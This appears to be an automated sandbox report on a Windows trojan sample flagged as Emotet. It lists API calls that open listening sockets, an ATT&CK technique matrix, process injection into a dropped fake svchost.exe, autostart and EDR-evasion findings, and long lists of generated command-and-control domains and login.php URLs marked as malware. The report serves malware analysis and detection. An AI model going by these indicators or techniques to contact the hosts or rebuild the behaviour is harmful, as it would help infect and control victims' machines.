Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_01311250 htons,socket,setsockopt,closesocket,bind,listen,22_2_01311250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_01310480 setsockopt,htons,socket,setsockopt,bind,22_2_01310480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012F9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,22_2_012F9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_015C1250 htons,socket,setsockopt,closesocket,bind,listen,25_2_015C1250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_015C0480 setsockopt,htons,socket,setsockopt,bind,25_2_015C0480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_015A9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,25_2_015A9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 27_2_00B11250 htons,socket,setsockopt,closesocket,bind,listen,27_2_00B11250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 27_2_00B10480 setsockopt,htons,socket,setsockopt,bind,27_2_00B10480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 27_2_00AF9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,27_2_00AF9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 29_2_012D1250 htons,socket,setsockopt,closesocket,bind,listen,29_2_012D1250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 29_2_012D0480 setsockopt,htons,socket,setsockopt,bind,29_2_012D0480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 29_2_012B9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,29_2_012B9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 31_2_01141250 htons,socket,setsockopt,closesocket,bind,listen,31_2_01141250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 31_2_01140480 setsockopt,htons,socket,setsockopt,bind,31_2_01140480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 31_2_01129E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,31_2_01129E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 33_2_01321250 htons,socket,setsockopt,closesocket,bind,listen,33_2_01321250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 33_2_01320480 setsockopt,htons,socket,setsockopt,bind,33_2_01320480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 33_2_01309E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,33_2_01309E40

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 22 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 111 Input Capture | 2 System Time Discovery | 1 Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 11 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | 111 Input Capture | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 11 Access Token Manipulation | 31 Software Packing | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 613 Process Injection | 1 DLL Side-Loading | LSA Secrets | 143 System Information Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Bootkit | 1 Scheduled Task/Job | 322 Masquerading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | 14 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | DCSync | 351 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 151 Virtualization/Sandbox Evasion | Proc Filesystem | 151 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Access Token Manipulation | /etc/passwd and /etc/shadow | 13 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 613 Process Injection | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |

  • Internet
Behavior Graph
ID: 1553825, Sample: Z8eHwAvqAh.exe, Startdate: 11/11/2024, Architecture: WINDOWS, Score: 100

  • DNS/IP: vowyzuf.com, vowymom.com, 1002 other IPs or domains
  • Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 19 other signatures
  • Process: Z8eHwAvqAh.exe 2 3 (started)
      • Dropped: C:\Windows\apppatch\svchost.exe, PE32
      • Dropped: C:\Windows\...\svchost.exe:Zone.Identifier, ASCII
      • Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Moves itself to temp directory; 8 other signatures
      • Process: svchost.exe 1 80 (started)
          • DNS/IP: vocypyt.com, pujycyp.com, 23 other IPs or domains
          • Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Creates an undocumented autostart registry key; 7 other signatures
          • Process: swvGCAxOMikYQeoQzimiprVu.exe (injected)
              • Signatures: Monitors registry run keys for changes; Contains VNC / remote desktop functionality (version string found); Found direct / indirect Syscall (likely to bypass EDR)
          • Process: swvGCAxOMikYQeoQzimiprVu.exe (injected)
          • Process: swvGCAxOMikYQeoQzimiprVu.exe (injected)
          • 10 other processes
              • Process: WerFault.exe 21 (started)
              • Process: WerFault.exe 16 (started)
              • Process: WerFault.exe (started)
              • Process: WerFault.exe (started)

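| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| Z8eHwAvqAh.exe | 84% | ReversingLabs | Win32.Trojan.Emotet | |
| Z8eHwAvqAh.exe | 100% | Avira | TR/Crypt.XPACK.Gen | |
| Z8eHwAvqAh.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Windows\apppatch\svchost.exe | 100% | Avira | TR/Crypt.XPACK.Gen | |
| C:\Windows\apppatch\svchost.exe | 100% | Joe Sandbox ML | | |
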
No Antivirus matches
No Antivirus matches
                                                                  unknowntrue
                                                                    unknown
                                                                    qekyluv.com
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      gatyrez.com
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        vofybic.com
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
                                                                          pujydag.com
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            vojykom.com
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              qetysuq.com
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                vonyzut.com
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  pufyjuq.com
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    pujytug.com
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      galyhiw.com
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        lykygun.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          vopymyc.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            gatyfaz.com
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              vojycit.com
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                lyvymej.com
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  lygyvar.com
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    purygiv.com
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      gahykeb.com
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        purymog.com
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          gadyzib.com
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            ganyqow.com
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              lyxysun.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                puzyjyg.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  vopydek.com
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    qexyfuq.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      gatykyh.com
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        vocykem.com
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          gahynus.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            pumypop.com
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              lyvysur.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                galypob.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  puzypav.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    gacyqoz.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      lykywid.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        lykytin.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          vofyref.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            qekytig.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              vocyzek.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                puvypoq.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  puvybeg.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    pupydig.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      pupyguq.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        qedyqal.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          vowymom.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            purypol.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              ganypeb.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                vopymit.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  vowyguf.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    pupytiq.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      lymyfoj.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        vowyzuf.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          gatyruw.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            qebynyg.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              puzymev.com
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyhil.com/login.phpsvchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gatyniz.com/svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pujylyv.com/svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pupyguq.com/login.phpsvchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puvyxig.com/login.phpgsvchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygysij.com/svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojyduf.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volydyk.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lysytoj.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pupycuv.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetykyq.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetyvil.com/login.phpsvchost.exe, 00000002.00000003.1871770823.0000000008BA4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vofypam.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puvydyp.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygyvuj.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lysynaj.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871067961.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puvypoq.com/svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzybil.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojybim.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzylyp.com/Hsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galyhib.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekynuq.com/http://vopypif.com/svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetylyv.com/svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lysyxar.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxygax.com/login.phpsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vopykum.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pumytup.com/login.phpsvchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ganynos.com/svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzypav.com/svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qexyreg.com/login.phpsvchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://ganyvyw.com/login.phpsvchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pumydyg.com/login.phpsvchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
